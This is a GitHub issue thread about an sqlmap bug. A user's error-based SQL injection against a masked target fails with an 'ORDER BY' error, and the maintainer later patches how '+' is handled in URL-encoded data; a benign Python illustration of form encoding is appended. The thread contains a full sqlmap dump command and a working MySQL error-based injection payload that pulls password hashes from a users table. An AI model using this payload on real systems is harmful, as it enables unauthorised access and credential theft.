error-based false #231

Closed
chym opened this issue Nov 2, 2012 · 3 comments

chym commented Nov 2, 2012

I used sqlmap to test an SQL vulnerability on my site, but sqlmap can't dump data

--random-agent -u xyz --data="submits=+ssssss+&username=l*&password=&x=45&y=7" -D ht_db -T en_users -C mail,password --dump --no-cast --hex -v 3

I tested with live header on Firefox with the sqlmap syntax 👍

post : xyz?md=login
data: submits=+ssssss+&username=l' AND (SELECT 9275 FROM(SELECT COUNT(*),CONCAT(0x3a6c65663a,(SELECT MID((HEX(password)),1,50) FROM ht_db.en_users ORDER BY mail LIMIT 82,1),0x3a7266653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EBZd'='EBZd&password=&x=35&y=16

and the response:

MySQL Error
Message: MySQL Query Error
SQL: select count(username) as counts from en_users where username='l' AND (SELECT 6076 FROM(SELECT COUNT(*),CONCAT(0x3a6c65663a,(SELECT MID((HEX(password)),1,50) FROM ht_db.en_users ORDER BY mail LIMIT 49,1),0x3a7266653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lyfN'='lyfN' and password='d41d8cd98f00b204e9800998ecf8427e' and ch=1
Error: Unknown column 'mail' in 'order clause'
Errno.: 1054

It seems "order by" can't be used in this case, please fix it.

Thanks


stamparm commented Nov 6, 2012

You haven't said whether sqlmap can find the SQLi vulnerability in the first place. If yes, then please post the whole injection console output (e.g. parameter ... is vulnerable to....).

Also, please don't put live URLs into issue tickets.

ghost assigned stamparm Nov 6, 2012

stamparm commented

@chym could you please give more details here (as stated in the previous comment)?

stamparm added a commit that referenced this issue Nov 14, 2012

stamparm commented

The plus sign was used here in a special manner (representing the space character in URL-encoded data). Patched now.
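
An added illustration of the encoding rule named in the last comment (not sqlmap's code or its patch, and not part of the thread): in `application/x-www-form-urlencoded` bodies `+` means a space and a literal plus must be sent as `%2B`, so a tool that rewrites one field must not decode and re-encode the other fields under mismatched rules. The body is a constructed sample modelled on the report, and the function names are hypothetical.

```python
from urllib.parse import parse_qsl, quote_plus, unquote, unquote_plus

# Constructed sample body modelled on the report above (no live target).
BODY = "submits=+ssssss+&username=l&password=&x=45&y=7"


def server_view(raw_body):
    """Decode the body the way a form-handling server does ('+' -> space)."""
    return dict(parse_qsl(raw_body, keep_blank_values=True))


def set_field_naive(raw_body, name, value):
    """Buggy: decodes with path rules (unquote keeps '+'), then re-encodes
    every field with form rules, so an untouched '+' turns into '%2B'."""
    pairs = [p.partition("=") for p in raw_body.split("&")]
    fields = [(unquote(k), unquote(v)) for k, _, v in pairs]
    fields = [(k, value if k == name else v) for k, v in fields]
    return "&".join(quote_plus(k) + "=" + quote_plus(v) for k, v in fields)


def set_field_safe(raw_body, name, value):
    """Replace one value and copy every other pair byte-for-byte."""
    out, found = [], False
    for pair in raw_body.split("&"):
        key, _, _old = pair.partition("=")
        if unquote_plus(key) == name:
            # Only the new value is encoded, with form rules:
            # space -> '+', literal '+' -> '%2B'.
            out.append(key + "=" + quote_plus(value))
            found = True
        else:
            out.append(pair)
    if not found:
        raise KeyError(name)
    return "&".join(out)


if __name__ == "__main__":
    new_value = "a+b c"  # constructed value holding a literal plus and a space
    for fn in (set_field_naive, set_field_safe):
        body = fn(BODY, "username", new_value)
        print(fn.__name__, body, server_view(body), sep="\n  ")
```

With the naive variant the server receives `submits` as `+ssssss+` instead of the original ` ssssss `, so the request no longer matches what the browser sent even though only `username` was meant to change.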
